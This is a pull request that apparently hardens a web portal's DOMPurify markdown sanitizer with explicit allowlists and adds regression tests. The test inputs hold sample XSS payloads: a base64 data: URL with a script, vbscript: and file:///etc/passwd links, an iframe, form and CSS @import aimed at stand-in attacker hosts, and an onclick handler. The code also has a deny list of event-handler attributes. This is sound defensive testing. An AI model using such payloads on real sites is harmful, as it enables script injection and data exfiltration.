### PR TITLE
fix(security): harden DOMPurify config with explicit allowlist (#865)

### DIFF
--- a/apps/participant-portal/src/lib/markdown.ts
+++ b/apps/participant-portal/src/lib/markdown.ts
@@ -2,7 +2,78 @@ import DOMPurify from "dompurify";
 import { marked } from "marked";
 
 /**
- * Issue #661: metadata.json の \`description\` 等の markdown source を HTML に変換し、
+ * Issue #865: DOMPurify config を allowlist 形式に明示化 (= permissive default を排除)。
+ *
+ * marked の出力に含まれる可能性のあるタグのみを許容し、 \`<iframe>\` / \`<script>\` /
+ * \`<form>\` / \`<style>\` などは default で剥がれる。 attribute は href / target / rel /
+ * code highlight 用 class のみ。 event handler (onerror / onclick 等) は ALLOWED_ATTR に
+ * 含まれていないので strip されるが、 DOMPurify の version regression を想定して
+ * FORBID_ATTR でも hardcode する (= defense-in-depth)。
+ *
+ * \`ALLOWED_URI_REGEXP\` で href / src の URL scheme を制限 — \`http://\` / \`https://\` /
+ * \`mailto:\` / 相対パス (\`/\`, \`#\`, \`?\`) のみ。 \`javascript:\` / \`data:\` / \`vbscript:\`
+ * は reject される。
+ */
+const ALLOWED_TAGS = [
+  "h1",
+  "h2",
+  "h3",
+  "h4",
+  "h5",
+  "h6",
+  "p",
+  "br",
+  "hr",
+  "strong",
+  "em",
+  "b",
+  "i",
+  "u",
+  "s",
+  "del",
+  "code",
+  "pre",
+  "blockquote",
+  "a",
+  "ul",
+  "ol",
+  "li",
+  "table",
+  "thead",
+  "tbody",
+  "tr",
+  "th",
+  "td",
+  "img",
+];
+
+const ALLOWED_ATTR = ["href", "target", "rel", "class", "src", "alt", "title"];
+
+/**
+ * 既知の event handler attribute を ALLOWED_ATTR の補集合に対して明示禁止する。
+ * DOMPurify default も同じだが、 future version regression のための redundant 防御。
+ */
+const FORBID_ATTR = [
+  "onerror",
+  "onload",
+  "onclick",
+  "onmouseover",
+  "onmouseout",
+  "onfocus",
+  "onblur",
+  "onchange",
+  "onsubmit",
+  "formaction",
+];
+
+/**
+ * URL scheme の allowlist。 \`http://\` / \`https://\` / \`mailto:\` / fragment / 相対パスのみ。
+ * \`javascript:\` / \`data:\` / \`vbscript:\` / \`file:\` を弾く。
+ */
+const ALLOWED_URI_REGEXP = /^(?:https?:|mailto:|#|\/|\.{1,2}\/|\?)/i;
+
+/**
+ * Issue #661 / #865: metadata.json の \`description\` 等の markdown source を HTML に変換し、
  * DOMPurify で sanitize した文字列を返す。 ProblemDetail / ProblemInfoSection で
  * \`dangerouslySetInnerHTML\` 経由で render する想定。
  *
@@ -10,12 +81,17 @@ import { marked } from "marked";
  *   - marked は default で raw HTML を許容する (= XSS リスク)。 ADR-008 で community
  *     contribution を受け入れる前提のため必ず DOMPurify を後段に挟む
  *   - rendering は同期 (= marked.parse の async option 非使用) で React 描画と整合
- *   - heading / list / table / code block / link / strong / em のみ保持し、 script /
- *     iframe / style 等は剥がす (= DOMPurify default profile で十分)
+ *   - 許容 tag / attribute を allowlist 化、 javascript: scheme を ALLOWED_URI_REGEXP で reject
  */
 export function renderMarkdownToSafeHtml(source: string): string {
   const rawHtml = marked.parse(source, { async: false }) as string;
+  // ALLOWED_TAGS / ALLOWED_ATTR の明示 allowlist は USE_PROFILES の add-on ではなく
+  // 「これだけ許す」 と読まれるため、 USE_PROFILES は併用しない (= 併用すると profile の
+  // tag が漏れる risk)。 SVG / MathML は default で disable される。
   return DOMPurify.sanitize(rawHtml, {
-    USE_PROFILES: { html: true },
+    ALLOWED_TAGS,
+    ALLOWED_ATTR,
+    FORBID_ATTR,
+    ALLOWED_URI_REGEXP,
   });
 }

--- a/apps/participant-portal/test/markdown.test.ts
+++ b/apps/participant-portal/test/markdown.test.ts
@@ -53,4 +53,59 @@ describe("renderMarkdownToSafeHtml (Issue #661)", () => {
     const html = renderMarkdownToSafeHtml("use `npm install` to ...");
     expect(html).toContain("<code>npm install</code>");
   });
+
+  describe("Issue #865: DOMPurify allowlist 強化", () => {
+    it("data: URL scheme を href から剥がすべき (= data:text/html;base64 XSS gadget 防御)", () => {
+      const html = renderMarkdownToSafeHtml(
+        "[click](data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==)",
+      );
+      expect(html).not.toMatch(/href="data:/);
+    });
+
+    it("vbscript: scheme を href から剥がすべき", () => {
+      const html = renderMarkdownToSafeHtml("[click](vbscript:msgbox(1))");
+      expect(html).not.toMatch(/href="vbscript:/);
+    });
+
+    it("file: scheme を href から剥がすべき", () => {
+      const html = renderMarkdownToSafeHtml("[click](file:///etc/passwd)");
+      expect(html).not.toMatch(/href="file:/);
+    });
+
+    it("<iframe> は ALLOWED_TAGS に無いので剥がすべき", () => {
+      const html = renderMarkdownToSafeHtml(
+        '<iframe src="https://attacker.evil.com"></iframe>Hello',
+      );
+      expect(html).not.toContain("<iframe");
+      expect(html).toContain("Hello");
+    });
+
+    it("<form action> は剥がすべき (= clickjacking / data exfil gadget)", () => {
+      const html = renderMarkdownToSafeHtml('<form action="https://attacker"><input></form>');
+      expect(html).not.toContain("<form");
+    });
+
+    it("<style> は剥がすべき (= CSS-based exfil)", () => {
+      const html = renderMarkdownToSafeHtml("<style>@import url(https://attacker/exfil)</style>Hi");
+      expect(html).not.toContain("<style");
+      expect(html).toContain("Hi");
+    });
+
+    it("onclick attribute は FORBID_ATTR で剥がすべき", () => {
+      const html = renderMarkdownToSafeHtml(
+        '<a href="https://example.com" onclick="alert(1)">x</a>',
+      );
+      expect(html).not.toContain("onclick");
+    });
+
+    it("正常な https:// link は保持すべき", () => {
+      const html = renderMarkdownToSafeHtml("[docs](https://example.com/docs)");
+      expect(html).toMatch(/href="https:\/\/example\.com\/docs"/);
+    });
+
+    it("mailto: link は保持すべき", () => {
+      const html = renderMarkdownToSafeHtml("[mail](mailto:a@example.com)");
+      expect(html).toMatch(/href="mailto:a@example\.com"/);
+    });
+  });
 });


### PR DESCRIPTION
## Summary

\`apps/participant-portal/src/lib/markdown.ts\` の DOMPurify config を明示 allowlist 形式に
切り替え、 attack surface を大幅に縮小:

- **ALLOWED_TAGS**: heading / list / table / code / inline formatting + a / img のみ
  (= 計 30 tag)。 \`<iframe>\` / \`<script>\` / \`<form>\` / \`<style>\` / \`<object>\` / \`<embed>\` は
  ALLOWED に無いため strip される。
- **ALLOWED_ATTR**: href / target / rel / class / src / alt / title のみ。 event handler
  attribute は不在。
- **FORBID_ATTR**: \`onerror\` / \`onload\` / \`onclick\` / \`onmouseover\` 等を hardcode
  (= DOMPurify version regression 対策の defense-in-depth)。
- **ALLOWED_URI_REGEXP**: \`https?:\` / \`mailto:\` / fragment / 相対パスのみ。 \`javascript:\` /
  \`data:\` / \`vbscript:\` / \`file:\` を href / src から弾く。
- **USE_PROFILES**: 削除 (= 明示 allowlist と併用すると profile から漏れる risk があるため)。

Closes #865

## Out of scope (= 別 PR)

biome / ESLint rule で \`dangerouslySetInnerHTML\` を \`markdown.ts\` 以外で禁止する
custom rule の追加。 現状 \`apps/participant-portal/src/pages/ProblemDetail.tsx\` の 1 件のみで、
すでに biome-ignore comment で audit 済。 新 sink が増えたら CI で気付ける程度の検出は
本 PR scope を超える。

## Regression 分析

- 既存 9 test (Issue #661 baseline) すべて pass
- 新規 9 test (attack scenario: data: / vbscript: / file: / iframe / form / style /
  onclick + happy: https / mailto) すべて pass
- markdown の正常レンダリング (heading / list / table / code) は不変

## 物理影響

- **UPDATE**: participant-portal dist bundle (= DOMPurify call signature のみ変更)
- **NO-OP**: backend / CDK / S3 / CloudFront は変更なし

## Test plan

- [x] \`make harness\` — invariant 違反 0 件
- [x] \`make before-commit\` — 155 test pass
- [x] 9 attack scenario test (data: / vbscript: / file: / iframe / form / style /
      onclick + 2 happy)

🤖 Generated with [Claude Code](https://claude.com/claude-code)